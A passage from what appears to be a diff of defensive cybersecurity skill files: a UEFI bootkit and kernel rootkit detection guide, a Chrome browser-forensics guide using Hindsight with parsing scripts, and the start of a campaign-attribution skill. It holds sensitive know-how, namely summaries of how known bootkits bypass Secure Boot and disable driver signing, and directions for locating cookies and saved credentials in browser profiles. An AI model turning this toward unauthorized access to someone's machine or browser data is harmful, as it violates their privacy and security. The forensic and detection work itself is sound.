python chipsec_main.py -m common.secureboot.variables

# Check SPI flash write protection
python chipsec_main.py -m common.bios_wp

# Check for known UEFI malware patterns
yara -r uefi_malware.yar firmware.rom
```

```
Known UEFI Bootkit Detection Points:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
LoJax (APT28):
  - Modified SPI flash
  - Added DXE driver that drops agent to Windows
  - Persists through OS reinstall and disk replacement

BlackLotus:
  - Exploits CVE-2022-21894 to bypass Secure Boot
  - Modifies EFI System Partition bootloader
  - Installs kernel driver during boot

CosmicStrand:
  - Modifies CSMCORE DXE firmware module
  - Hooks kernel initialization during boot
  - Drops shellcode into Windows kernel memory

MoonBounce:
  - SPI flash implant in CORE_DXE module
  - Hooks EFI Boot Services functions (AllocatePool, CreateEventEx, ExitBootServices)
  - Deploys user-mode implant through boot chain

ESPecter:
  - Modifies Windows Boot Manager on ESP
  - Patches winload.efi to disable DSE
  - Loads unsigned kernel driver
```

### Step 4: Detect Kernel-Level Rootkit Behavior

Analyze the running system for rootkit artifacts:

```bash
# Memory forensics for rootkit detection
# SSDT hook detection
vol3 -f memory.dmp windows.ssdt | grep -v "ntoskrnl\|win32k"

# Hidden processes (DKOM)
vol3 -f memory.dmp windows.psscan > psscan.txt
vol3 -f memory.dmp windows.pslist > pslist.txt
# Diff to find hidden processes

# Kernel callback registration (rootkits register callbacks for filtering)
vol3 -f memory.dmp windows.callbacks

# Driver analysis
vol3 -f memory.dmp windows.driverscan
vol3 -f memory.dmp windows.modules

# Check for unsigned drivers
vol3 -f memory.dmp windows.driverscan | while read -r line; do
    driver_path=$(echo "$line" | awk '{print $NF}')
    if [ -f "$driver_path" ]; then
        sigcheck -nobanner "$driver_path" 2>/dev/null | grep "Unsigned"
    fi
done

# IDT hook detection
vol3 -f memory.dmp windows.idt
```
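
The "diff to find hidden processes" step can be sketched as follows. The code assumes the saved plugin output has rows whose first three whitespace-separated columns are PID, PPID, and image name, which is an assumption about the text layout and should be checked against the actual files. `parse_processes` and `hidden_candidates` are hypothetical helpers, and the sample text is invented.

```python
def parse_processes(text):
    """Map PID -> image name for rows that start with two integers (PID, PPID)."""
    processes = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[0].isdigit() and fields[1].isdigit():
            processes[int(fields[0])] = fields[2]
    return processes


def hidden_candidates(pslist_text, psscan_text):
    """Processes found by pool scanning but absent from the active process list."""
    listed = parse_processes(pslist_text)
    scanned = parse_processes(psscan_text)
    return {pid: name for pid, name in scanned.items() if pid not in listed}


# Invented sample output; real input would be pslist.txt and psscan.txt
PSLIST = """PID PPID ImageFileName
4 0 System
612 4 smss.exe
"""
PSSCAN = """PID PPID ImageFileName
4 0 System
612 4 smss.exe
3120 612 svch0st.exe
"""

for pid, name in sorted(hidden_candidates(PSLIST, PSSCAN).items()):
    print(f"candidate hidden process: PID {pid} ({name})")
```

Results are candidates rather than proof: pool scanning also recovers terminated processes, so each hit still needs to be checked for an exit time and other context.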

### Step 5: Boot Process Integrity Verification

Verify the integrity of the entire boot chain:

```powershell
# Verify Windows Boot Manager signature
sigcheck -a C:\Windows\Boot\EFI\bootmgfw.efi

# Verify winload.efi
sigcheck -a C:\Windows\System32\winload.efi

# Verify ntoskrnl.exe
sigcheck -a C:\Windows\System32\ntoskrnl.exe

# Enumerate firmware boot entries and look for unexpected boot applications
# (Measured Boot logs, if a TPM is available, are stored under C:\Windows\Logs\MeasuredBoot)
bcdedit /enum firmware

# Verify Secure Boot state
Confirm-SecureBootUEFI  # PowerShell cmdlet

# Check boot configuration for tampering
bcdedit /v

# Look for boot configuration changes
# testsigning: should be No
# nointegritychecks: should be No
# debug: should be No
bcdedit | findstr /i "testsigning nointegritychecks debug"
```
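
When boot configuration output is collected from many hosts, the three settings above can be checked automatically. The sketch below assumes each relevant line of saved `bcdedit` output has the form `name    Yes|No`, which is an assumption about the text layout; `risky_boot_settings` is a hypothetical helper and the sample text is invented.

```python
RISKY_SETTINGS = ("testsigning", "nointegritychecks", "debug")


def risky_boot_settings(bcdedit_output):
    """Return the risky settings that are switched on in saved bcdedit output."""
    findings = []
    for line in bcdedit_output.splitlines():
        parts = line.split(None, 1)  # setting name, then the rest of the line
        if len(parts) != 2:
            continue
        name, value = parts[0].lower(), parts[1].strip().lower()
        if name in RISKY_SETTINGS and value == "yes":
            findings.append(name)
    return findings


# Invented sample; real input would be the saved output of `bcdedit`
SAMPLE_OUTPUT = """Windows Boot Loader
-------------------
identifier              {current}
path                    \\Windows\\system32\\winload.efi
testsigning             Yes
nointegritychecks       No
debug                   No
"""

print(risky_boot_settings(SAMPLE_OUTPUT))
```

An empty result only means these flags are off in the captured output; a bootkit that patches the loader in memory would not necessarily show up here, so the signature checks above still apply.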

### Step 6: Document Bootkit/Rootkit Analysis

Compile comprehensive analysis findings:

```
Analysis should document:
- Boot sector (MBR/VBR) integrity status with hex comparison
- UEFI firmware module inventory and integrity verification
- Secure Boot status and any bypass mechanisms detected
- Kernel-level hooks (SSDT, IDT, IRP, inline) identified
- Hidden processes, drivers, and files discovered
- Persistence mechanism (SPI flash, ESP, MBR, kernel driver)
- Boot chain integrity verification results
- Attribution to known bootkit families if possible
- Remediation steps (reflash firmware, rebuild MBR, replace hardware)
```
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|------------|
| **Bootkit** | Malware that infects the boot process (MBR, VBR, UEFI) to execute before the operating system loads, gaining persistent low-level control |
| **MBR (Master Boot Record)** | First 512 bytes of a disk containing bootstrap code and partition table; MBR bootkits replace this code with malicious loaders |
| **UEFI (Unified Extensible Firmware Interface)** | Modern firmware interface replacing BIOS; UEFI bootkits implant malicious modules in firmware volumes or modify the ESP |
| **Secure Boot** | UEFI security feature verifying digital signatures of boot components; bootkits like BlackLotus exploit vulnerabilities to bypass it |
| **SPI Flash** | Flash memory chip storing UEFI firmware; advanced bootkits like LoJax and MoonBounce modify SPI flash for firmware-level persistence |
| **DKOM (Direct Kernel Object Manipulation)** | Rootkit technique modifying kernel structures to hide processes, files, and network connections without hooking functions |
| **Driver Signature Enforcement (DSE)** | Windows security feature requiring kernel drivers to be digitally signed; bootkits disable DSE during boot to load unsigned rootkit drivers |
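The MBR entry above can be checked mechanically. A minimal sketch, assuming the first sector of the disk has already been dumped to a file (for example with dd) and that a known-good hash is available for comparison. `inspect_mbr` is a hypothetical helper, and hashing only the first 440 bytes is a design choice that excludes the per-disk signature Windows stores at offset 440.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_CODE_SIZE = 440  # bootstrap code area that precedes the optional disk signature


def inspect_mbr(sector: bytes) -> dict:
    """Summarize the first sector of a disk image for comparison against a baseline."""
    if len(sector) < SECTOR_SIZE:
        raise ValueError("need at least 512 bytes")
    # The on-disk bytes 55 AA at offset 510 read as 0xAA55 in little-endian order.
    signature = struct.unpack_from("<H", sector, 510)[0]
    return {
        "signature_valid": signature == 0xAA55,
        "boot_code_sha256": hashlib.sha256(sector[:BOOT_CODE_SIZE]).hexdigest(),
    }


if __name__ == "__main__":
    blank_sector = bytes(510) + b"\x55\xaa"
    print(inspect_mbr(blank_sector))
```

A valid boot signature says nothing about whether the bootstrap code is clean; the hash comparison against a known-good MBR for the same OS version carries the actual finding.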
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **UEFITool**: Open-source UEFI firmware image editor and parser for inspecting firmware volumes, drivers, and modules
|
||||
- **chipsec**: Intel hardware security assessment framework for verifying SPI flash protection, Secure Boot, and UEFI configuration
|
||||
- **Volatility**: Memory forensics framework with SSDT, IDT, callback, and driver analysis plugins for kernel rootkit detection
|
||||
- **GMER**: Windows rootkit detection tool scanning for SSDT hooks, IDT hooks, hidden processes, and modified kernel modules
|
||||
- **Bootkits Analyzer**: Specialized tool for analyzing MBR/VBR code including disassembly and comparison against known-good baselines
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Investigating Persistent Compromise Surviving OS Reinstallation
|
||||
|
||||
**Context**: An organization reimaged a compromised workstation, but the same C2 beaconing resumed within hours. Standard disk forensics finds no malware. UEFI bootkit is suspected.
|
||||
|
||||
**Approach**:
|
||||
1. Boot from a Linux live USB to avoid executing any compromised OS components
|
||||
2. Dump the SPI flash firmware using chipsec or flashrom for offline analysis
|
||||
3. Dump the MBR and VBR sectors with dd for boot sector analysis
|
||||
4. Copy the EFI System Partition for bootloader integrity verification
|
||||
5. Open the SPI dump in UEFITool and compare module GUIDs against vendor-provided firmware
|
||||
6. Look for additional or modified DXE drivers that should not be present
|
||||
7. Analyze any suspicious modules with Ghidra (x86_64 UEFI module format)
|
||||
8. Verify Secure Boot configuration and check for exploit-based bypasses
|
||||
|
||||
**Pitfalls**:
|
||||
- Analyzing the system while the compromised OS is running (rootkit may hide from live analysis)
|
||||
- Not checking SPI flash (only analyzing disk-based boot components misses firmware-level implants)
|
||||
- Assuming Secure Boot prevents all bootkits (known bypasses exist, e.g., CVE-2022-21894)
|
||||
- Not preserving the original firmware dump before reflashing (critical evidence for attribution)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
BOOTKIT / ROOTKIT ANALYSIS REPORT
|
||||
====================================
|
||||
System: Dell OptiPlex 7090 (UEFI, TPM 2.0)
|
||||
Firmware Version: 1.15.0 (Dell)
|
||||
Secure Boot: ENABLED (but bypassed)
|
||||
Capture Method: Linux Live USB + chipsec SPI dump
|
||||
|
||||
MBR/VBR ANALYSIS
|
||||
MBR Signature: Valid (0x55AA)
|
||||
MBR Code: MATCHES standard Windows 10 MBR (clean)
|
||||
VBR Code: MATCHES standard NTFS VBR (clean)
|
||||
|
||||
UEFI FIRMWARE ANALYSIS
|
||||
Total Modules: 287
|
||||
Vendor Expected: 285
|
||||
Extra Modules: 2 UNAUTHORIZED
|
||||
[!] DXE Driver GUID: {ABCD1234-...} "SmmAccessDxe_mod" (MODIFIED)
|
||||
Original Size: 12,288 bytes
|
||||
Current Size: 45,056 bytes (32KB ADDED)
|
||||
Entropy: 7.82 (HIGH - encrypted payload)
|
||||
|
||||
[!] DXE Driver GUID: {EFGH5678-...} "UefiPayloadDxe" (NEW - not in vendor firmware)
|
||||
Size: 28,672 bytes
|
||||
Function: Drops persistence agent during boot
|
||||
|
||||
BOOT CHAIN INTEGRITY
|
||||
bootmgfw.efi: MODIFIED (hash mismatch, Secure Boot bypass via CVE-2022-21894)
|
||||
winload.efi: MODIFIED (DSE disabled at load time)
|
||||
ntoskrnl.exe: CLEAN (but unsigned driver loaded after boot)
|
||||
|
||||
KERNEL ROOTKIT COMPONENTS
|
||||
Driver: C:\Windows\System32\drivers\null_mod.sys (unsigned, hidden)
|
||||
SSDT Hooks: 3 (NtQuerySystemInformation, NtQueryDirectoryFile, NtDeviceIoControlFile)
|
||||
Hidden Processes: 2 (PID 6784: beacon.exe, PID 6812: keylog.exe)
|
||||
Hidden Files: C:\Windows\System32\drivers\null_mod.sys
|
||||
|
||||
ATTRIBUTION
|
||||
Family: BlackLotus variant
|
||||
Confidence: HIGH (CVE-2022-21894 exploit, ESP modification pattern matches)
|
||||
|
||||
REMEDIATION
|
||||
1. Reflash SPI firmware with clean vendor image via hardware programmer
|
||||
2. Rebuild EFI System Partition from clean Windows installation media
|
||||
3. Reinstall OS from verified media
|
||||
4. Enable all firmware write protections
|
||||
5. Update firmware to the latest version and apply the Windows boot manager patches and Secure Boot revocation (DBX) updates that address CVE-2022-21894
|
||||
```
|
||||
@@ -0,0 +1,215 @@
|
||||
---
|
||||
name: analyzing-browser-forensics-with-hindsight
|
||||
description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing history, downloads, cookies, cached content, autofill data, saved passwords, and browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [browser-forensics, hindsight, chrome-forensics, chromium, edge, browsing-history, cookies, downloads, cache, web-artifacts]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Browser Forensics with Hindsight
|
||||
|
||||
## Overview
|
||||
|
||||
Hindsight is an open-source browser forensics tool designed to parse artifacts from Google Chrome and other Chromium-based browsers (Microsoft Edge, Brave, Opera, Vivaldi). It extracts and correlates data from multiple browser database files to create a unified timeline of web activity. Hindsight can parse URLs, download history, cache records, bookmarks, autofill records, saved passwords, preferences, browser extensions, HTTP cookies, Local Storage (HTML5 cookies), login data, and session/tab information. The tool produces chronological timelines in multiple output formats (XLSX, JSON, SQLite) that enable investigators to reconstruct user web activity for incident response, insider threat investigations, and criminal cases.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.8+ with Hindsight installed (`pip install pyhindsight`)
|
||||
- Access to browser profile directories from forensic image
|
||||
- Browser profile data (not encrypted with OS-level encryption)
|
||||
- Timeline Explorer or spreadsheet application for analysis
|
||||
|
||||
## Browser Profile Locations
|
||||
|
||||
| Browser | Profile Path |
|---------|--------------|
| Chrome (Windows) | %LOCALAPPDATA%\Google\Chrome\User Data\Default\ |
| Edge (Windows) | %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\ |
| Brave (Windows) | %LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default\ |
| Opera (Windows) | %APPDATA%\Opera Software\Opera Stable\ |
| Vivaldi (Windows) | %LOCALAPPDATA%\Vivaldi\User Data\Default\ |
| Chrome (macOS) | ~/Library/Application Support/Google/Chrome/Default/ |
| Chrome (Linux) | ~/.config/google-chrome/Default/ |
|
||||
|
||||
## Key Artifact Files
|
||||
|
||||
| File | Contents |
|------|----------|
| History | URL visits, downloads, keyword searches |
| Cookies | HTTP cookies with domain, expiry, values |
| Web Data | Autofill entries, saved credit cards |
| Login Data | Saved usernames/passwords (encrypted) |
| Bookmarks | JSON bookmark tree |
| Preferences | Browser configuration and extensions |
| Local Storage/ | HTML5 Local Storage per domain |
| Session Storage/ | Session-specific storage per domain |
| Network Action Predictor | Previously typed URLs |
| Shortcuts | Omnibox shortcuts and predictions |
| Top Sites | Frequently visited sites |
|
||||
|
||||
## Running Hindsight
|
||||
|
||||
### Command Line
|
||||
|
||||
```bash
|
||||
# Basic analysis of a Chrome profile
|
||||
hindsight.exe -i "C:\Evidence\Users\suspect\AppData\Local\Google\Chrome\User Data\Default" -o C:\Output\chrome_analysis
|
||||
|
||||
# Specify browser type
|
||||
hindsight.exe -i "/path/to/profile" -o /output/analysis -b Chrome
|
||||
|
||||
# JSON output format
|
||||
hindsight.exe -i "C:\Evidence\Chrome\Default" -o C:\Output\chrome --format jsonl
|
||||
|
||||
# With cache parsing (slower but more complete)
|
||||
hindsight.exe -i "C:\Evidence\Chrome\Default" -o C:\Output\chrome --cache
|
||||
```
|
||||
|
||||
### Web UI
|
||||
|
||||
```bash
|
||||
# Start Hindsight web interface
|
||||
hindsight_gui.exe
|
||||
# Navigate to http://localhost:8080
|
||||
# Upload or point to browser profile directory
|
||||
# Configure output format and analysis options
|
||||
# Generate and download report
|
||||
```
|
||||
|
||||
## Artifact Analysis Details
|
||||
|
||||
### URL History and Visits
|
||||
|
||||
```sql
|
||||
-- Chrome History database schema (key tables)
|
||||
-- urls table: id, url, title, visit_count, typed_count, last_visit_time
|
||||
-- visits table: id, url, visit_time, from_visit, transition, segment_id
|
||||
|
||||
-- Timestamps are Chrome/WebKit format: microseconds since 1601-01-01
|
||||
-- Convert: datetime((visit_time/1000000)-11644473600, 'unixepoch')
|
||||
```
|
||||
|
||||
### Download History
|
||||
|
||||
```sql
|
||||
-- downloads table: id, current_path, target_path, start_time, end_time,
|
||||
-- received_bytes, total_bytes, state, danger_type, interrupt_reason,
|
||||
-- url, referrer, tab_url, mime_type, original_mime_type
|
||||
```
|
||||
|
||||
### Cookie Analysis
|
||||
|
||||
```sql
|
||||
-- cookies table: creation_utc, host_key, name, value, encrypted_value,
|
||||
-- path, expires_utc, is_secure, is_httponly, last_access_utc,
|
||||
-- has_expires, is_persistent, priority, samesite
|
||||
```
|
||||
|
||||
## Python Analysis Script
|
||||
|
||||
```python
import sqlite3
import os
import json
import sys
from datetime import datetime, timedelta


CHROME_EPOCH = datetime(1601, 1, 1)


def chrome_time_to_datetime(chrome_ts: int):
    """Convert Chrome timestamp to datetime."""
    if chrome_ts == 0:
        return None
    try:
        return CHROME_EPOCH + timedelta(microseconds=chrome_ts)
    except (OverflowError, OSError):
        return None


def analyze_chrome_history(profile_path: str, output_dir: str) -> dict:
    """Analyze Chrome History database for forensic evidence."""
    history_db = os.path.join(profile_path, "History")
    if not os.path.exists(history_db):
        return {"error": "History database not found"}

    os.makedirs(output_dir, exist_ok=True)
    conn = sqlite3.connect(f"file:{history_db}?mode=ro", uri=True)

    # URL visits with timestamps
    cursor = conn.cursor()
    cursor.execute("""
        SELECT u.url, u.title, v.visit_time, u.visit_count,
               v.transition & 0xFF as transition_type
        FROM visits v JOIN urls u ON v.url = u.id
        ORDER BY v.visit_time DESC LIMIT 5000
    """)
    visits = [{
        "url": r[0], "title": r[1],
        "visit_time": str(chrome_time_to_datetime(r[2])),
        "total_visits": r[3], "transition": r[4]
    } for r in cursor.fetchall()]

    # Downloads
    cursor.execute("""
        SELECT target_path, tab_url, start_time, end_time,
               received_bytes, total_bytes, mime_type, state
        FROM downloads ORDER BY start_time DESC LIMIT 1000
    """)
    downloads = [{
        "path": r[0], "source_url": r[1],
        "start_time": str(chrome_time_to_datetime(r[2])),
        "end_time": str(chrome_time_to_datetime(r[3])),
        "received_bytes": r[4], "total_bytes": r[5],
        "mime_type": r[6], "state": r[7]
    } for r in cursor.fetchall()]

    # Keyword searches
    cursor.execute("""
        SELECT k.term, u.url, k.url_id
        FROM keyword_search_terms k JOIN urls u ON k.url_id = u.id
        ORDER BY u.last_visit_time DESC LIMIT 1000
    """)
    searches = [{"term": r[0], "url": r[1]} for r in cursor.fetchall()]

    conn.close()

    report = {
        "analysis_timestamp": datetime.now().isoformat(),
        "profile_path": profile_path,
        "total_visits": len(visits),
        "total_downloads": len(downloads),
        "total_searches": len(searches),
        "visits": visits,
        "downloads": downloads,
        "searches": searches
    }

    report_path = os.path.join(output_dir, "browser_forensics.json")
    with open(report_path, "w") as f:
        json.dump(report, f, indent=2)

    return report


def main():
    if len(sys.argv) < 3:
        print("Usage: python process.py <chrome_profile_path> <output_dir>")
        sys.exit(1)
    analyze_chrome_history(sys.argv[1], sys.argv[2])


if __name__ == "__main__":
    main()
```
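The script above keeps only the low byte of `transition` (`v.transition & 0xFF`), which identifies how the visit was initiated. A minimal sketch of turning that number into a label, assuming the core values defined in Chromium's `page_transition_types.h`; verify them against the Chromium version under examination. `describe_transition` is a hypothetical helper name.

```python
# Core page transition types (low 8 bits of visits.transition).
# Assumption: values follow Chromium's page_transition_types.h.
CORE_TRANSITIONS = {
    0: "LINK",
    1: "TYPED",
    2: "AUTO_BOOKMARK",
    3: "AUTO_SUBFRAME",
    4: "MANUAL_SUBFRAME",
    5: "GENERATED",
    6: "AUTO_TOPLEVEL",
    7: "FORM_SUBMIT",
    8: "RELOAD",
    9: "KEYWORD",
    10: "KEYWORD_GENERATED",
}


def describe_transition(transition: int) -> str:
    """Map a raw or already-masked transition value to its core type name."""
    core = transition & 0xFF  # qualifier flags live in the upper bits
    return CORE_TRANSITIONS.get(core, f"UNKNOWN({core})")


if __name__ == "__main__":
    for raw in (1, 0x10000008, 255):
        print(raw, describe_transition(raw))
```

The distinction matters in practice: `TYPED` visits suggest the user entered the URL deliberately, while `LINK` or `AUTO_SUBFRAME` visits can be generated by page content.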
|
||||
|
||||
## References
|
||||
|
||||
- Hindsight GitHub: https://github.com/obsidianforensics/hindsight
|
||||
- Chrome Forensics Guide: https://allenace.medium.com/hindsight-chrome-forensics-made-simple-425db99fa5ed
|
||||
- Browser Forensics Tools: https://www.cyberforensicacademy.com/blog/browser-forensics-tools-how-to-extract-user-activity
|
||||
- Chromium Source (History): https://source.chromium.org/chromium/chromium/src/+/main:components/history/
|
||||
@@ -0,0 +1,22 @@
|
||||
# Browser Forensics Report
## Case Info
| Field | Value |
|-------|-------|
| Case Number | |
| Browser | |
| Profile Path | |
## Activity Summary
| Metric | Count |
|--------|-------|
| URL Visits | |
| Downloads | |
| Saved Passwords | |
| Cookies | |
## Notable URLs
| Timestamp | URL | Title |
|-----------|-----|-------|
| | | |
## Downloads
| Timestamp | File | Source URL | Size |
|-----------|------|-----------|------|
| | | | |
|
||||
@@ -0,0 +1,15 @@
|
||||
# Standards - Browser Forensics with Hindsight
|
||||
## Tools
|
||||
- Hindsight: https://github.com/obsidianforensics/hindsight
|
||||
- DB Browser for SQLite: Chrome database inspection
|
||||
- ChromeCacheView (NirSoft): Cache analysis
|
||||
## Browser Databases
|
||||
- History: URL visits, downloads, keyword searches
|
||||
- Cookies: HTTP cookies per domain
|
||||
- Web Data: Autofill, credit cards
|
||||
- Login Data: Saved credentials (encrypted)
|
||||
- Bookmarks: JSON bookmark tree
|
||||
## Timestamp Formats
|
||||
- Chrome/WebKit: microseconds since 1601-01-01 UTC
|
||||
- Firefox/Mozilla: microseconds since Unix epoch
|
||||
- Safari/Mac: seconds since 2001-01-01 UTC
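The three timestamp formats above differ only in epoch and unit. A minimal sketch of converting each to a timezone-aware UTC `datetime`; the function names are illustrative, and the sample values were chosen so that all three describe the same instant.

```python
from datetime import datetime, timedelta, timezone

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def from_webkit(microseconds: int) -> datetime:
    """Chrome/WebKit: microseconds since 1601-01-01 UTC."""
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def from_firefox(microseconds: int) -> datetime:
    """Firefox/Mozilla: microseconds since the Unix epoch."""
    return UNIX_EPOCH + timedelta(microseconds=microseconds)


def from_safari(seconds: float) -> datetime:
    """Safari/Mac: seconds since 2001-01-01 UTC."""
    return MAC_EPOCH + timedelta(seconds=seconds)


if __name__ == "__main__":
    print(from_webkit(13_300_000_000_000_000))  # 2022-06-18 04:26:40+00:00
    print(from_firefox(1_655_526_400_000_000))  # 2022-06-18 04:26:40+00:00
    print(from_safari(677_219_200))             # 2022-06-18 04:26:40+00:00
```

Keeping every converted value in UTC avoids off-by-hours errors when browser activity is later correlated with system logs recorded in local time.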
|
||||
@@ -0,0 +1,19 @@
|
||||
# Workflows - Browser Forensics
|
||||
## Workflow: Chrome Profile Analysis
|
||||
```
Locate browser profile directory
    |
Run Hindsight against profile path
    |
Review generated timeline (XLSX/JSON)
    |
Analyze URL history for suspicious sites
    |
Check downloads for malware/exfiltrated data
    |
Review cookies for session hijacking evidence
    |
Examine autofill and saved credentials
    |
Correlate browser activity with system timeline
```
|
||||
@@ -0,0 +1,31 @@
|
||||
#!/usr/bin/env python3
"""Browser Forensics Analyzer - Parses Chrome History SQLite for investigation."""
import sqlite3, json, os, sys
from datetime import datetime, timedelta

CHROME_EPOCH = datetime(1601, 1, 1)

def chrome_ts(ts):
    if not ts: return None
    try: return str(CHROME_EPOCH + timedelta(microseconds=ts))
    except (OverflowError, TypeError): return None

def analyze_chrome(profile: str, output_dir: str) -> str:
    os.makedirs(output_dir, exist_ok=True)
    history_db = os.path.join(profile, "History")
    conn = sqlite3.connect(f"file:{history_db}?mode=ro", uri=True)
    c = conn.cursor()
    c.execute("SELECT u.url, u.title, v.visit_time, u.visit_count FROM visits v JOIN urls u ON v.url=u.id ORDER BY v.visit_time DESC LIMIT 2000")
    visits = [{"url": r[0], "title": r[1], "time": chrome_ts(r[2]), "count": r[3]} for r in c.fetchall()]
    c.execute("SELECT target_path, tab_url, start_time, total_bytes, mime_type FROM downloads ORDER BY start_time DESC LIMIT 500")
    downloads = [{"path": r[0], "url": r[1], "time": chrome_ts(r[2]), "size": r[3], "mime": r[4]} for r in c.fetchall()]
    conn.close()
    report = {"visits": len(visits), "downloads": len(downloads), "visit_data": visits, "download_data": downloads}
    out = os.path.join(output_dir, "browser_forensics.json")
    with open(out, "w") as f: json.dump(report, f, indent=2)
    print(f"[*] Visits: {len(visits)}, Downloads: {len(downloads)}")
    return out

if __name__ == "__main__":
    if len(sys.argv) < 3: print("Usage: process.py <chrome_profile> <output>"); sys.exit(1)
    analyze_chrome(sys.argv[1], sys.argv[2])
|
||||
@@ -0,0 +1,216 @@
|
||||
---
|
||||
name: analyzing-campaign-attribution-evidence
|
||||
description: Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attribution indicators using the Diamond Model and ACH (Analysis of Competing Hypotheses).
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [threat-intelligence, cti, ioc, mitre-attack, stix, attribution, campaign-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Campaign Attribution Evidence
|
||||
|
||||
## Overview
|
||||
|
||||
Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attribution indicators using the Diamond Model and ACH (Analysis of Competing Hypotheses), analyzing infrastructure overlaps, TTP consistency, malware code similarities, operational timing patterns, and language artifacts to build confidence-weighted attribution assessments.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `attackcti`, `stix2`, `networkx` libraries
|
||||
- Access to threat intelligence platforms (MISP, OpenCTI)
|
||||
- Understanding of Diamond Model of Intrusion Analysis
|
||||
- Familiarity with MITRE ATT&CK threat group profiles
|
||||
- Knowledge of malware analysis and infrastructure tracking techniques
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Attribution Evidence Categories
|
||||
1. **Infrastructure Overlap**: Shared C2 servers, domains, IP ranges, hosting providers
|
||||
2. **TTP Consistency**: Matching ATT&CK techniques and sub-techniques across campaigns
|
||||
3. **Malware Code Similarity**: Shared code bases, compilers, PDB paths, encryption routines
|
||||
4. **Operational Patterns**: Timing (working hours, time zones), targeting patterns, operational tempo
|
||||
5. **Language Artifacts**: Embedded strings, variable names, error messages in specific languages
|
||||
6. **Victimology**: Target sector, geography, and organizational profile consistency
|
||||
|
||||
### Confidence Levels
|
||||
- **High Confidence**: Multiple independent evidence categories converge on same actor
|
||||
- **Moderate Confidence**: Several evidence categories match, some ambiguity remains
|
||||
- **Low Confidence**: Limited evidence, possible false flags or shared tooling
|
||||
|
||||
### Analysis of Competing Hypotheses (ACH)
|
||||
Structured analytical method that evaluates evidence against multiple competing hypotheses. Each piece of evidence is scored as consistent, inconsistent, or neutral with respect to each hypothesis. The hypothesis with the least inconsistent evidence is favored.
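The selection rule described above (favor the hypothesis with the least inconsistent evidence) can be sketched in a few lines. This is an illustration under stated assumptions, not the skill's scoring method: the matrix layout, the `C`/`I`/`N` codes, and the actor names are all hypothetical.

```python
from collections import Counter


def rank_by_inconsistency(matrix: dict[str, dict[str, str]]) -> list[tuple[str, int]]:
    """Rank hypotheses by how many evidence items contradict them, fewest first.

    matrix maps hypothesis name -> {evidence_id: "C" | "I" | "N"}.
    """
    counts = {
        hypothesis: Counter(ratings.values())["I"]
        for hypothesis, ratings in matrix.items()
    }
    return sorted(counts.items(), key=lambda item: item[1])


if __name__ == "__main__":
    ach_matrix = {
        "Actor A": {"e1": "C", "e2": "I", "e3": "I"},
        "Actor B": {"e1": "C", "e2": "N", "e3": "C"},
    }
    for hypothesis, inconsistent in rank_by_inconsistency(ach_matrix):
        print(f"{hypothesis}: {inconsistent} inconsistent item(s)")
```

Counting only inconsistencies is deliberate: consistent evidence often fits several hypotheses at once, so it discriminates less than evidence that rules a hypothesis out.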
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Collect Attribution Evidence
|
||||
|
||||
```python
from stix2 import MemoryStore, Filter
from collections import defaultdict

class AttributionAnalyzer:
    def __init__(self):
        self.evidence = []
        self.hypotheses = {}

    def add_evidence(self, category, description, value, confidence):
        self.evidence.append({
            "category": category,
            "description": description,
            "value": value,
            "confidence": confidence,
            "timestamp": None,
        })

    def add_hypothesis(self, actor_name, actor_id=""):
        self.hypotheses[actor_name] = {
            "actor_id": actor_id,
            "consistent_evidence": [],
            "inconsistent_evidence": [],
            "neutral_evidence": [],
            "score": 0,
        }

    def evaluate_evidence(self, evidence_idx, actor_name, assessment):
        """Assess evidence against a hypothesis: consistent/inconsistent/neutral."""
        if assessment == "consistent":
            self.hypotheses[actor_name]["consistent_evidence"].append(evidence_idx)
            self.hypotheses[actor_name]["score"] += self.evidence[evidence_idx]["confidence"]
        elif assessment == "inconsistent":
            self.hypotheses[actor_name]["inconsistent_evidence"].append(evidence_idx)
            self.hypotheses[actor_name]["score"] -= self.evidence[evidence_idx]["confidence"] * 2
        else:
            self.hypotheses[actor_name]["neutral_evidence"].append(evidence_idx)

    def rank_hypotheses(self):
        """Rank hypotheses by attribution score."""
        ranked = sorted(
            self.hypotheses.items(),
            key=lambda x: x[1]["score"],
            reverse=True,
        )
        return [
            {
                "actor": name,
                "score": data["score"],
                "consistent": len(data["consistent_evidence"]),
                "inconsistent": len(data["inconsistent_evidence"]),
                "confidence": self._score_to_confidence(data["score"]),
            }
            for name, data in ranked
        ]

    def _score_to_confidence(self, score):
        if score >= 80:
            return "HIGH"
        elif score >= 40:
            return "MODERATE"
        else:
            return "LOW"
```
|
||||
|
||||
### Step 2: Infrastructure Overlap Analysis
|
||||
|
||||
```python
def analyze_infrastructure_overlap(campaign_a_infra, campaign_b_infra):
    """Compare infrastructure between two campaigns for attribution."""
    overlap = {
        "shared_ips": set(campaign_a_infra.get("ips", [])).intersection(
            campaign_b_infra.get("ips", [])
        ),
        "shared_domains": set(campaign_a_infra.get("domains", [])).intersection(
